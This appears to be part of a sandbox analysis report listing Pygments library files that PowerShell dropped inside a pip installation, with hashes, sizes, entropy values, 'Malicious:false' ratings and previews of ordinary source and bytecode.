                              SSDEEP:192:yzahzSRS39vCmomv5pmv/qmwIXRJwUpFd5LEabrrHEbQHsmmk5zcjklSSiu:yzaCS39vCZUHUCpER9F54urItCjS4
                              MD5:922BF9ADD1A73680FAF6F6EBBE8AB329
                              SHA1:C976A3EBEDFF96FE93CC3EDBFD805250A73BA77C
                              SHA-256:8F92848B93BF550E464B9F47E3D97ED7483350E9162B197019E54C9463B630C9
                              SHA-512:AD30AD5999E0186DFD3D5A04079ECE2EECA23179BBD0400A87DBD00E283E27E7F1CF810CAD8FB8A14A73BD47D7BCA378753E1DDECBAA77DC6C2BC7933F1F4C71
                              Malicious:false
                              Preview:""". pygments.lexers. ~~~~~~~~~~~~~~~.. Pygments lexers... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import re.import sys.import types.import fnmatch.from os.path import basename..from pip._vendor.pygments.lexers._mapping import LEXERS.from pip._vendor.pygments.modeline import get_filetype_from_buffer.from pip._vendor.pygments.plugin import find_plugin_lexers.from pip._vendor.pygments.util import ClassNotFound, guess_decode..COMPAT = {. 'Python3Lexer': 'PythonLexer',. 'Python3TracebackLexer': 'PythonTracebackLexer',.}..__all__ = ['get_lexer_by_name', 'get_lexer_for_filename', 'find_lexer_class',. 'guess_lexer', 'load_lexer_from_file'] + list(LEXERS) + list(COMPAT).._lexer_cache = {}._pattern_cache = {}...def _fn_matches(fn, glob):. """Return whether the supplied file name fn matches pattern filename.""". if glob not in _pattern_cache:. pattern = _pattern_cache[glob] = re.c
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):14663
                              Entropy (8bit):5.524716202157973
                              Encrypted:false
                              SSDEEP:192:UhwcQ8m+5UMD78Bmq5isJnOXRKipvP5ZlddHEunTxYSbeZRDWSiQLt1:ny54BPQsJnGRKg5Zld/TxYS8RDCQ51
                              MD5:02E5C5FFB0DF49B145EC81968AA62BFF
                              SHA1:526DB2D173A74A2A2D424A2FCD8D9F284EC523E8
                              SHA-256:3C059976A7654E11E603600F0E37762D100C88DD2AE9B2A82AFC413D15BDA886
                              SHA-512:70EC46BE27CEAD27F8659B3571E5FAD37DB679D6880C8C663A34D74815A5665DEECBBCEE16DF384B37903F8786EF05AB332F4DF19145FB9F59B1151D43906383
                              Malicious:false
                              Preview:........=.Cfb/..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.d...Z.g.d.....e.e.........z.....e.e.........z...Z.i.Z.i.Z.d...Z.d...Z.d.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.d...Z.d.d...Z.d...Z d...Z!..G.d...d.e.jD..........................Z#e.jH..................e%....Z&..e#e%........Z'e'jP..................jS..................e&jP............................e'e.jH..................e%<...e'`'e'`&e'`.e'`.y.).z.. pygments.lexers. ~~~~~~~~~~~~~~~.. Pygments lexers... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...basename)...LEXERS)...get_filetype_from_buffer)...find_plugin_lexers)...ClassNotFound..guess_decode..PythonLexer..PythonTracebackLexer)...Python3Lexer..Python3TracebackLexer)...get_lexer_by_name..get_lexer_for_filename..find_lexer_class..guess_lexer..load_lexer_from_filec...........................|.t.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64415
                              Entropy (8bit):5.981118177293901
                              Encrypted:false
                              SSDEEP:768:bAeiyMKm3ySJGP+ZPQ7MfIqdNXPxxL9yVASYNIoggZl/8rz7XMKTXSWg2k6fvMPP:bbVE3ywGp+PWD/rsKTgBWMdJv
                              MD5:F22765DBAF4BCE7C6B27417554F6BB1B
                              SHA1:8D1FF9C5D822A6F7CDF5511A37095F4A45930DF5
                              SHA-256:4C2C886910E806B3CD3C885E15120FE74FE0F1C6830C56CF05C8FA934C0D158E
                              SHA-512:05BD09A94B2E29AF612591465E9982DD7036590F232909B0C93E26E933C89DB97C97FFAE9ECB17671179BA2BBBEAE8F673D5B3B53A56CA61D7F7F54F9C812F06
                              Malicious:false
                              Preview:........=.CfY...............................i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d!..i.d"d#..d$d%..d&d'..d(d)..d*d+..d,d-..d.d/..d0d1..d2d3..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC....i.dDdE..dFdG..dHdI..dJdK..dLdM..dNdO..dPdQ..dRdS..dTdU..dVdW..dXdY..dZd[..d\d]..d^d_..d`da..dbdc..ddde....i.dfdg..dhdi..djdk..dldm..dndo..dpdq..drds..dtdu..dvdw..dxdy..dzd{..d|d}..d~d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d..d.d....i.d.d..d.d..d.d..d.d...d.d...d.d...d.d...d.d...d.d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....i...d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...d.....d...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):42650
                              Entropy (8bit):5.891979555836276
                              Encrypted:false
                              SSDEEP:768:cqDydI7noECe//hA4tj5O4qAFsSXnekabgCLku2umqo+wUglZn:cqDydIroze//e4qAsSXnKbgCLk0No+UZ
                              MD5:545E25DF2DDA9CB96F073D31FCE63B38
                              SHA1:D0880D08D80B167B41CE43D16C0597F265479E9F
                              SHA-256:CF84D7627BF44AD566278270EDB0BF0DAA6A63A74713FFF6393142C645749C79
                              SHA-512:260E3465A446B4DB0024659AB5094AC22789E4BB396A9EEE8A3E3EAF69B6977A02024CCAB45408DC7FD34026467BA3CE3B835D9F60CAF39865D4B101C71E34B9
                              Malicious:false
                              Preview:........=.Cf..........................z.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l m!Z"..g.d...Z#..G.d...d.e.........Z$e$Z%..G.d...d.e.........Z&..G.d...d.e.........Z'..G.d...d.e.........Z(..G.d...d.e.........Z)e)Z*..G.d...d.e.........Z+..G.d...d.e.........Z,..G.d...d.e.........Z-..G.d...d.e$........Z.y.).z.. pygments.lexers.python. ~~~~~~~~~~~~~~~~~~~~~~.. Lexers for Python and related languages... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...DelegatingLexer..Lexer..RegexLexer..include..bygroups..using..default..words..combined..do_insertions..this..line_re)...get_bool_opt..shebang_matches)...Text..Comment..Operator..Keyword..Name..String..Number..Punctuation..Generic..Other..Error..Whitespace)...unistring)...PythonLexer..PythonConsoleLexer..PythonTracebackLexer..Python2Lexer..Python2T
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with very long lines (371)
                              Category:dropped
                              Size (bytes):72281
                              Entropy (8bit):4.940249409955633
                              Encrypted:false
                              SSDEEP:768:9Rrzm8jB8WD/b8Wqu9Pf/EiNdfMGoMCtzeaxoNgBUE8:n59H/LjoMKzeaxQgBUf
                              MD5:54CC01AC45B6392658DFC66616D6956F
                              SHA1:ED7FE41CE6FE8446D6C4DDF9A230CD1CC2861B2C
                              SHA-256:1EDB38AFF650F2271FB4633B82404F7840F9972552BF869F7C5817604E80A74E
                              SHA-512:165A8816E6804053635CBEF59CCB1410E84D99041FE5EA026728E693B77F839DE03799EB20E67BCBEA9FF0B6036E1A8495F2689AD20D30B208E307FBF5880405
                              Malicious:false
                              Preview:# Automatically generated by scripts/gen_mapfiles.py..# DO NOT EDIT BY HAND; run `tox -e mapfiles` instead...LEXERS = {. 'ABAPLexer': ('pip._vendor.pygments.lexers.business', 'ABAP', ('abap',), ('*.abap', '*.ABAP'), ('text/x-abap',)),. 'AMDGPULexer': ('pip._vendor.pygments.lexers.amdgpu', 'AMDGPU', ('amdgpu',), ('*.isa',), ()),. 'APLLexer': ('pip._vendor.pygments.lexers.apl', 'APL', ('apl',), ('*.apl', '*.aplf', '*.aplo', '*.apln', '*.aplc', '*.apli', '*.dyalog'), ()),. 'AbnfLexer': ('pip._vendor.pygments.lexers.grammar_notation', 'ABNF', ('abnf',), ('*.abnf',), ('text/x-abnf',)),. 'ActionScript3Lexer': ('pip._vendor.pygments.lexers.actionscript', 'ActionScript 3', ('actionscript3', 'as3'), ('*.as',), ('application/x-actionscript3', 'text/x-actionscript3', 'text/actionscript3')),. 'ActionScriptLexer': ('pip._vendor.pygments.lexers.actionscript', 'ActionScript', ('actionscript', 'as'), ('*.as',), ('application/x-actionscript', 'text/x-actionscript', 'text/actionscript'
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):53424
                              Entropy (8bit):4.641604482748351
                              Encrypted:false
                              SSDEEP:1536:2wdxZ60UuYZO/o45VqLkddHZ6L+p8HUWpqLHPtNOfj1AGSvM:3hUuYZOF5VqiK+p83q8AM
                              MD5:AB99BADC8C34B2ADC7F7F12888A3A0F9
                              SHA1:8CAC7E5D493ED6185EEC6C8B1628109F888F28C1
                              SHA-256:73B8E798A154F432F14C95B451BC17B7A67D149A9B06556C580D50AFDC5203FC
                              SHA-512:883CB64AAC1D0DAFACD1FC7A88DF310E4AF05192979A527B7DA7A162CE555CF41CC9DDF761E34BD706EB951DE7791506FDD4B85296BF731B935A93B2DDB4FBD6
                              Malicious:false
                              Preview:""". pygments.lexers.python. ~~~~~~~~~~~~~~~~~~~~~~.. Lexers for Python and related languages... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import re.import keyword..from pip._vendor.pygments.lexer import DelegatingLexer, Lexer, RegexLexer, include, \. bygroups, using, default, words, combined, do_insertions, this, line_re.from pip._vendor.pygments.util import get_bool_opt, shebang_matches.from pip._vendor.pygments.token import Text, Comment, Operator, Keyword, Name, String, \. Number, Punctuation, Generic, Other, Error, Whitespace.from pip._vendor.pygments import unistring as uni..__all__ = ['PythonLexer', 'PythonConsoleLexer', 'PythonTracebackLexer',. 'Python2Lexer', 'Python2TracebackLexer',. 'CythonLexer', 'DgLexer', 'NumPyLexer']...class PythonLexer(RegexLexer):. """. For Python source code (version 3.x)... .. versionadded:: 0.10.. .. versionchanged:: 2.5.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):986
                              Entropy (8bit):4.678227732447655
                              Encrypted:false
                              SSDEEP:24:Yx/GAoh8vJgdj8/7Yd2TOR81a3/TFGNXu:Yx/G4vI3NR8O/Twu
                              MD5:D3E1EE4B236E922D813DDAEB2D7C41FA
                              SHA1:5DD98A164720F0A9E9009C4F6496E4C712C25EFC
                              SHA-256:785DAF3B82E9386A0FBC828A91B3DF9F2BADF214F852279B64FA5BF8160641D2
                              SHA-512:07E8C333AD40BFF9667C917B5A0BA7E379D4589DFD7940E7CD39D841DD8506DBCEB86A1B52DDECE03F34A5420252B9EFAFA827EDEDA0FCF7D3721C4AF7342435
                              Malicious:false
                              Preview:""". pygments.modeline. ~~~~~~~~~~~~~~~~~.. A simple modeline parser (based on pymodeline)... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import re..__all__ = ['get_filetype_from_buffer']...modeline_re = re.compile(r'''. (?: vi | vim | ex ) (?: [<=>]? \d* )? :. .* (?: ft | filetype | syn | syntax ) = ( [^:\s]+ ).''', re.VERBOSE)...def get_filetype_from_line(l):. m = modeline_re.search(l). if m:. return m.group(1)...def get_filetype_from_buffer(buf, max_lines=5):. """. Scan the buffer for modelines and return filetype if one is found.. """. lines = buf.splitlines(). for l in lines[-1:-max_lines-1:-1]:. ret = get_filetype_from_line(l). if ret:. return ret. for i in range(max_lines, -1, -1):. if i < len(lines):. ret = get_filetype_from_line(lines[i]). if ret:. return ret.. return None.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):2591
                              Entropy (8bit):4.726117618854269
                              Encrypted:false
                              SSDEEP:48:YhRbZ6mQ4Aa4vRpmCgVVGs+LzXLXc2cKAbWQukkTWmB/OvvKvkAE:YhRbZ6rNLvOCWVH+Lz7Xrkb1doNB/OH1
                              MD5:4EE97EFA46A09BC0DB7804732A21E6A7
                              SHA1:A228E13247816E21675FB132A0FC79F983565F9C
                              SHA-256:8F5161DF5D116D5D8343D9EF92692ABE58F7F20772B982A594B9C6C5B73CB093
                              SHA-512:4701DC530F1EA8D8B50A3E6BA34C75F67B120D5AE7A40662F303BB6C42636BDBF4A2CB1F7F3FEFB087EE92685FE4F6E8B9F5E95EE6CEAB20BE515C09E99B61EE
                              Malicious:false
                              Preview:""". pygments.plugin. ~~~~~~~~~~~~~~~.. Pygments plugin interface. By default, this tries to use. ``importlib.metadata``, which is in the Python standard. library since Python 3.8, or its ``importlib_metadata``. backport for earlier versions of Python. It falls back on. ``pkg_resources`` if not found. Finally, if ``pkg_resources``. is not found either, no plugins are loaded at all... lexer plugins::.. [pygments.lexers]. yourlexer = yourmodule:YourLexer.. formatter plugins::.. [pygments.formatters]. yourformatter = yourformatter:YourFormatter. /.ext = yourformatter:YourFormatter.. As you can see, you can define extensions for the formatter. with a leading slash... syntax plugins::.. [pygments.styles]. yourstyle = yourstyle:YourStyle.. filter plugin::.. [pygments.filter]. yourfilter = yourfilter:YourFilter... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :l
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):3072
                              Entropy (8bit):4.501618524220782
                              Encrypted:false
                              SSDEEP:48:YeG4aXu83xvydcb7cttfb8HZ/W1X1orYrdhNc/tJB7EghskXCch19MMhvugBu6j:YeHal3xvyuGQ5AXV8AuvHjNcc
                              MD5:6D8F778A626089EE1F3324EFFE8C3139
                              SHA1:495022FA953387139FBD39FA16586D6FDDE7CA2D
                              SHA-256:8E0D402E881C60653DE93412F62B0197A742AEFC39CB9FBE04FFCAFAE164FFCB
                              SHA-512:7E039FF20E146755041EB572156440F2BB5E1DBAE6E99DC12F1C8F80C070B9D48995EC30DF40FDE59929694876F7FF24DE67096CBD4515B0EF2E301A73B31729
                              Malicious:false
                              Preview:""". pygments.regexopt. ~~~~~~~~~~~~~~~~~.. An algorithm that generates optimized regexes for matching long lists of. literal strings... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import re.from re import escape.from os.path import commonprefix.from itertools import groupby.from operator import itemgetter..CS_ESCAPE = re.compile(r'[\[\^\\\-\]]').FIRST_ELEMENT = itemgetter(0)...def make_charset(letters):. return '[' + CS_ESCAPE.sub(lambda m: '\\' + m.group(), ''.join(letters)) + ']'...def regex_opt_inner(strings, open_paren):. """Return a regex that matches any string in the sorted list of strings.""". close_paren = open_paren and ')' or ''. # print strings, repr(open_paren). if not strings:. # print '-> nothing left'. return ''. first = strings[0]. if len(strings) == 1:. # print '-> only 1 string'. return open_paren + escape(first) + close_paren. i
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):3092
                              Entropy (8bit):4.332795149986856
                              Encrypted:false
                              SSDEEP:96:YEit5Ec3S39ich97fOMMbGgrcG4NPcwYMobHKS:Xit3C39iU7sLrJePvaHKS
                              MD5:9C0E01E94CCC6829A47A1CA12327EC20
                              SHA1:C1EDC8470764067799D4AC97E13BC0C088456526
                              SHA-256:6FF9EEE7F7F71C2812769E52FDA351050D4C4829B86630F079CD8E993462724C
                              SHA-512:C9AB0F787EFEE674D1FA8A6B87CA996E54FB9CC494D45B61BD12C266A760BCBF0399B5A9D666AE044F087E8FDD21C45EE9BA59465C1286DF27F9E69376BFE3E8
                              Malicious:false
                              Preview:""". pygments.scanner. ~~~~~~~~~~~~~~~~.. This library implements a regex based scanner. Some languages. like Pascal are easy to parse but have some keywords that. depend on the context. Because of this it's impossible to lex. that just by using a regular expression lexer like the. `RegexLexer`... Have a look at the `DelphiLexer` to get an idea of how to use. this scanner... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details..""".import re...class EndOfText(RuntimeError):. """. Raise if end of text is reached and the user. tried to call a match function.. """...class Scanner:. """. Simple scanner.. All method patterns are regular expression strings (not. compiled expressions!). """.. def __init__(self, text, flags=0):. """. :param text: The text which should be scanned. :param flags: default regular expression flags. """. self.da
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):6882
                              Entropy (8bit):4.501142767387457
                              Encrypted:false
                              SSDEEP:96:Y8HHCiYBsfeyCqEaXMTCksxrf/kOiD3RcRM1J9nEJITTZc82geqLxXV+:R9YB5y5EzahkOv+Txk
                              MD5:829572F07739757E94EE77937738BCAA
                              SHA1:33DD28B3E9AD132BDD7061FE54E4974D0822BA3E
                              SHA-256:C011589B5F34A9E6BD24AB7FFD4CE14653513617333C31436AA183DB5B1BBACA
                              SHA-512:9ACA4C1B20790D7EA6DBBCD40D1F304BD4355387703AF88847BC4D4DC409F37C3B40C6B65E9C87596A30D3522A4A341C4E8DBCC1BF71A560A4A6152E716E24ED
                              Malicious:false
                              Preview:""". pygments.sphinxext. ~~~~~~~~~~~~~~~~~~.. Sphinx extension to generate automatic documentation of lexers,. formatters and filters... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import sys..from docutils import nodes.from docutils.statemachine import ViewList.from docutils.parsers.rst import Directive.from sphinx.util.nodes import nested_parse_with_titles...MODULEDOC = '''... module:: %s..%s.%s.'''..LEXERDOC = '''... class:: %s.. :Short names: %s. :Filenames: %s. :MIME types: %s.. %s..'''..FMTERDOC = '''... class:: %s.. :Short names: %s. :Filenames: %s.. %s..'''..FILTERDOC = '''... class:: %s.. :Name: %s.. %s..'''...class PygmentsDoc(Directive):. """. A directive to collect all lexers/formatters/filters and generate. autoclass directives for them.. """. has_content = False. required_arguments = 1. optional_arguments = 0. final_argument_whitespa
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):6257
                              Entropy (8bit):4.24089828992328
                              Encrypted:false
                              SSDEEP:96:Ytjbx1ewk5pZCCYbVXHCVBbm7TjV63vmZ7RwTWwzOfppGK/l+5bmhpzNHzM7VC40:sTyKmxuTjV63vmZlcy/UYDNyk
                              MD5:A05E45FDA259362F1407D294CDB11BC6
                              SHA1:D48162A00E73B97C0480333914810D5F98F61A03
                              SHA-256:0B8AB2A09AD44E4ABE395DE23BEF15CF752D598A49C124DD879FEF94608674D4
                              SHA-512:F06CD361E396E0828205FF33EF242162652A10C6EBBD45DB0D50C089BC93B53CFA9C0117FEEA495AABE97176EEEC9C8C146B950F5037B2574AE7A27761AE2008
                              Malicious:false
                              Preview:""". pygments.style. ~~~~~~~~~~~~~~.. Basic style object... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from pip._vendor.pygments.token import Token, STANDARD_TYPES..# Default mapping of ansixxx to RGB colors.._ansimap = {. # dark. 'ansiblack': '000000',. 'ansired': '7f0000',. 'ansigreen': '007f00',. 'ansiyellow': '7f7fe0',. 'ansiblue': '00007f',. 'ansimagenta': '7f007f',. 'ansicyan': '007f7f',. 'ansigray': 'e5e5e5',. # normal. 'ansibrightblack': '555555',. 'ansibrightred': 'ff0000',. 'ansibrightgreen': '00ff00',. 'ansibrightyellow': 'ffff00',. 'ansibrightblue': '0000ff',. 'ansibrightmagenta': 'ff00ff',. 'ansibrightcyan': '00ffff',. 'ansiwhite': 'ffffff',.}.# mapping of deprecated #ansixxx colors to new color names._deprecated_ansicolors = {. # dark. '#ansiblack': 'ansiblack',. '#ansidarkred': 'ansired',. '#ansidarkgreen': 'ansigreen',.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):3700
                              Entropy (8bit):4.765716195149535
                              Encrypted:false
                              SSDEEP:96:YhhjaTBfCtchGEhZAcX/rPesS9eRqjOEJ2zg:lB6tchJHPCeg
                              MD5:504FC26BC1867F96329F33FF849E7119
                              SHA1:76A719FB4C7EF7B5C52EDF2F31A33824CB21B803
                              SHA-256:85EEC78D0C7BB02D1DDA47D354B8D4B34275E66B53A0933A3356EBC089BDFBE4
                              SHA-512:FDE51769F61E116E83FC2766C44BA72AECEE013CBE8473546F169C199E0B4207FA11F52144C38CD33CE60B8068E14A89102B01A17BCC4BA3ADDAC0F706D7ADA7
                              Malicious:false
                              Preview:""". pygments.styles. ~~~~~~~~~~~~~~~.. Contains built-in styles... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..from pip._vendor.pygments.plugin import find_plugin_styles.from pip._vendor.pygments.util import ClassNotFound..#: A dictionary of built-in styles, mapping style names to.#: ``'submodule::classname'`` strings..STYLE_MAP = {. 'default': 'default::DefaultStyle',. 'emacs': 'emacs::EmacsStyle',. 'friendly': 'friendly::FriendlyStyle',. 'friendly_grayscale': 'friendly_grayscale::FriendlyGrayscaleStyle',. 'colorful': 'colorful::ColorfulStyle',. 'autumn': 'autumn::AutumnStyle',. 'murphy': 'murphy::MurphyStyle',. 'manni': 'manni::ManniStyle',. 'material': 'material::MaterialStyle',. 'monokai': 'monokai::MonokaiStyle',. 'perldoc': 'perldoc::PerldocStyle',. 'pastie': 'pastie::PastieStyle',. 'borland': 'borland::BorlandStyle',. 'trac': 'trac::T
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4459
                              Entropy (8bit):6.045681730876615
                              Encrypted:false
                              SSDEEP:96:CKhhyNZAZwvXRzSB61/OBdh4qDnpPjOd+1GrUZAHfim:wNKZwvXde6oBdhOAZQim
                              MD5:63ACEF7448BBFDAE5D61FAE5C6D5AF7E
                              SHA1:486F91A04F1B35AADF5FC87E42C76B2C8B6EC772
                              SHA-256:11F6E28655284752F950962FDE5DD955B46D5937801D927ADD4A856F2354956A
                              SHA-512:193E57581931C87DBDC78C569ED7FCABD073085D4AE9AC8E9A326FE1AA8D81B2F335DBE07FBB871435195FD94676AB8B93E02BEAFCE007C1DF854CAA3164E82B
                              Malicious:false
                              Preview:........=.Cft.........................".....d.Z.d.d.l.m.Z...d.d.l.m.Z...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d!..d"d#..d$d%..i.d&d'..d(d)..d*d+..d,d-..d.d/..d0d1..d2d3..d4d5..d6d7..d8d9..d:d;..d<d=..d>d?..d@dA..dBdC..dDdE..dFdG....dHdIdIdJdKdLdMdNdOdPdQdRdSdTdU....Z.dV..Z.dW..Z.yX)Yz.. pygments.styles. ~~~~~~~~~~~~~~~.. Contains built-in styles... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...find_plugin_styles)...ClassNotFound..defaultz.default::DefaultStyle..emacsz.emacs::EmacsStyle..friendlyz.friendly::FriendlyStyle..friendly_grayscalez*friendly_grayscale::FriendlyGrayscaleStyle..colorfulz.colorful::ColorfulStyle..autumnz.autumn::AutumnStyle..murphyz.murphy::MurphyStyle..manniz.manni::ManniStyle..materialz.material::MaterialStyle..monokaiz.monokai::MonokaiStyle..perldocz.perldoc::PerldocStyle..pastiez.pastie::PastieStyle..borlandz.borland::BorlandS
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):6184
                              Entropy (8bit):4.104488169596893
                              Encrypted:false
                              SSDEEP:96:YYlvDjqgwTGiDBdEnE2cwdOEr8gewUVbNrv8ikM4q8wrwTKMBG0Y0ML6viXy6cBd:JZw6PE2cwdzuGGL6V
                              MD5:B5268388890E89F2C2B1979520D938AB
                              SHA1:6F402016A74D090B88CC9BBEE0405F42443BFC05
                              SHA-256:B1E36C99C721F4E1075D88AB87C3A897BC3CC4385F3536CB8F9AC7002FA073FA
                              SHA-512:898B6980918C040D54E858C9CC2B51C417CDAFAD48E2FEFEB4142907CFC12D7AC6655E8B8BFFC1A9FDD2B3162DF8B87D26E6BAB051AE0BE3A0A25C1EED2C8DF0
                              Malicious:false
                              Preview:""". pygments.token. ~~~~~~~~~~~~~~.. Basic token types and the standard tokens... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""...class _TokenType(tuple):. parent = None.. def split(self):. buf = []. node = self. while node is not None:. buf.append(node). node = node.parent. buf.reverse(). return buf.. def __init__(self, *args):. # no need to call super.__init__. self.subtypes = set().. def __contains__(self, val):. return self is val or (. type(val) is self.__class__ and. val[:len(self)] == self. ).. def __getattr__(self, val):. if not val or not val[0].isupper():. return tuple.__getattribute__(self, val). new = _TokenType(self + (val,)). setattr(self, val, new). self.subtypes.add(new). new.parent = self. return new.. def __repr_
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with very long lines (10457)
                              Category:dropped
                              Size (bytes):63223
                              Entropy (8bit):4.139122109033449
                              Encrypted:false
                              SSDEEP:768:Tr/qYI7ziJJ7MFjasklc2CqQiKlvCuybmiZVoFD7TimSFqcaJPhCgQTyM7r2PTbK:HiYI7ziH7RyqQWuP9TWzaVhCt+33pZb6
                              MD5:A3BBB41C5DD21FC0235A7ED7AE80D3BB
                              SHA1:4A4A8A85179B27A74B15D7150730C10DD789B1B7
                              SHA-256:15A51F1B5E0D04910A2D0A18F6A8FA258797AE961C2E62AE96085DC4E18568E7
                              SHA-512:71BA17D0DDC6815A35FCBDA2BA3B99560F50795327C29CF7D555AB96FBE4EFCBE8213F5774FE100D8982ABDD84F619C27CCF40CB55D494E9E36CA7E287559324
                              Malicious:false
                              Preview:""". pygments.unistring. ~~~~~~~~~~~~~~~~~~.. Strings of all Unicode characters of a certain category.. Used for matching in Unicode-aware languages. Run to regenerate... Inspired by chartypes_create.py from the MoinMoin project... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..Cc = '\x00-\x1f\x7f-\x9f'..Cf = '\xad\u0600-\u0605\u061c\u06dd\u070f\u08e2\u180e\u200b-\u200f\u202a-\u202e\u2060-\u2064\u2066-\u206f\ufeff\ufff9-\ufffb\U000110bd\U000110cd\U0001bca0-\U0001bca3\U0001d173-\U0001d17a\U000e0001\U000e0020-\U000e007f'..Cn = '\u0378-\u0379\u0380-\u0383\u038b\u038d\u03a2\u0530\u0557-\u0558\u058b-\u058c\u0590\u05c8-\u05cf\u05eb-\u05ee\u05f5-\u05ff\u061d\u070e\u074b-\u074c\u07b2-\u07bf\u07fb-\u07fc\u082e-\u082f\u083f\u085c-\u085d\u085f\u086b-\u089f\u08b5\u08be-\u08d2\u0984\u098d-\u098e\u0991-\u0992\u09a9\u09b1\u09b3-\u09b5\u09ba-\u09bb\u09c5-\u09c6\u09c9-\u09ca\u09cf-\u09d6\u09d8-\u09db\u09de\u09e4-\u09
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):10230
                              Entropy (8bit):4.673119780722134
                              Encrypted:false
                              SSDEEP:192:6aZUBSPTM96yiA3T1jWthar2zSUU8dAvqIAp+NlaG7hEwA:3ZrTm3BOzRdAvqmeG7u7
                              MD5:1C23AD75B86808830E887C883470BBBA
                              SHA1:2D7CA5A0F7D31ECB4EBE340F3649FD149F7726EC
                              SHA-256:004558D2AA27CB210C82FE03A3674836BAEA500C149365D84AA1CCEB9D2ECDE9
                              SHA-512:B7E42E7CEA62D75022B77403BBBF403AD796136795D86612660EE28271DBDA3785F627868CFF49C91279DDC0B13E6D8ADA8CDD69B24907B0F30928352B8352C2
                              Malicious:false
